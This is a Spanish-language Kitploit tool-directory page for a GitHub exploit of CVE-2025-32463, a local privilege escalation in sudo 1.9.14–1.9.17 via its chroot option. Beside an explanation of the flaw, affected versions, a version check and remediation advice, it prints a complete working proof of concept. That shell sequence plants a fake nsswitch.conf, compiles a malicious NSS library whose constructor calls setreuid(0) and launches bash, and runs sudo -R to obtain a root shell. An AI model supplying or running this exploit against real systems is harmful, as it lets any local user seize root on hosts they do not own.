Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32463_exploit — Exploit de escalada de privilegios local para sudo 1.9.14-1.9.17 que abusa del manejo de chroot de CVE-2025-32463, plantando un constructor de biblioteca NSS malicioso para generar un shell root para cualquier usuario local. | Kitploit
Herramientas/GitHubGitHub/0xdak/cve-2025-32463_exploit
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónDesarrollo de Payloads
GitHub0xdak/cve-2025-32463_exploit

CVE-2025-32463_exploit

Exploit de escalada de privilegios local para sudo 1.9.14-1.9.17 que abusa del manejo de chroot de CVE-2025-32463, plantando un constructor de biblioteca NSS malicioso para generar un shell root para cualquier usuario local.

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
hace 15 díasAún no revisado

CVE-2025-32463 — sudo "chwoot" chroot: escalada local de privilegios

Escalada local de privilegios a root en sudo mediante la opción --chroot (-R). Funciona para cualquier usuario local, incluidas cuentas sin ninguna entrada en sudoers (p. ej. www-data).

sudo 1.9.14 – 1.9.17 hace chroot() al directorio proporcionado por el usuario mientras la política de sudoers todavía se está evaluando — es decir, antes de la decisión de autorización. Después de ese chroot(), las búsquedas NSS de sudo leen /etc/nsswitch.conf desde dentro del chroot del atacante, y glibc convierte un nombre de fuente falso en dlopen("libnss_<name>.so.2") — que se carga y su constructor se ejecuta como root.

Colocar un nsswitch.conf falso (passwd: /woot1337) junto con una libnss_/woot1337.so.2 maliciosa cuyo constructor ELF ejecuta setreuid(0) + exec("/bin/bash") produce una shell de root. El exploit se dispara antes de la comprobación de sudoers, por lo que quien lo ejecuta no necesita privilegios de sudo.

  • Afectado: sudo 1.9.14 – 1.9.17
  • Corregido: 1.9.17p1 (el cambio de chroot de 1.9.14 se revirtió; la funcionalidad quedó obsoleta)
  • CWE: 829 (Inclusión de funcionalidad desde una esfera de control no confiable)
  • Impacto: cualquier usuario local → root. Bug lógico determinista (sin corrupción de memoria, sin fuerza bruta).
  • Divulgado por Rich Mirch (Stratascale), 2025.

Requisitos

Biblioteca estándar de Python 3, un sudo setuid vulnerable (1.9.14–1.9.17) y gcc en el objetivo (para compilar el pequeño módulo libnss). Ejecute como el usuario con pocos privilegios.

Uso

root@kitploit:~
python3 exploit.py            # -> interactive root shell
python3 exploit.py -c 'id'    # run a single command as root

Cómo funciona

  1. Preparar un directorio chroot con etc/nsswitch.conf = passwd: /woot1337 (+ una copia de /etc/group).
  2. Compilar libnss_/woot1337.so.2 — un ELF cuyo constructor (__attribute__((constructor))) ejecuta setreuid(0,0) y execl("/bin/bash", …).
  3. sudo -R woot woot — sudo hace chroot en woot, resuelve NSS, hace dlopen de libnss_/woot1337.so.2 como root, y el constructor proporciona una shell de root — antes de que sudo siquiera compruebe si el usuario está autorizado.

PoC manual canónico (Stratascale / pr0v3rbs "chwoot"):

root@kitploit:~
cd $(mktemp -d); mkdir -p woot/etc libnss_
echo 'passwd: /woot1337' > woot/etc/nsswitch.conf; cp /etc/group woot/etc
cat > w.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void){setreuid(0,0);setregid(0,0);chdir("/");execl("/bin/bash","/bin/bash","-p",NULL);}
EOF
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 w.c
sudo -R woot woot        # -> root

Comprobación de un objetivo

root@kitploit:~
sudo --version | head -1   # "Sudo version 1.9.14" .. "1.9.17" => vulnerable ; 1.9.17p1 => patched

Remediación

Actualice sudo a ≥ 1.9.17p1. La funcionalidad de chroot está obsoleta y no se debería depender de ella.

Aviso legal

Solo para pruebas de seguridad autorizadas y fines educativos. Úselo únicamente contra sistemas que usted posea o para los que tenga permiso explícito de prueba.

Descargar herramienta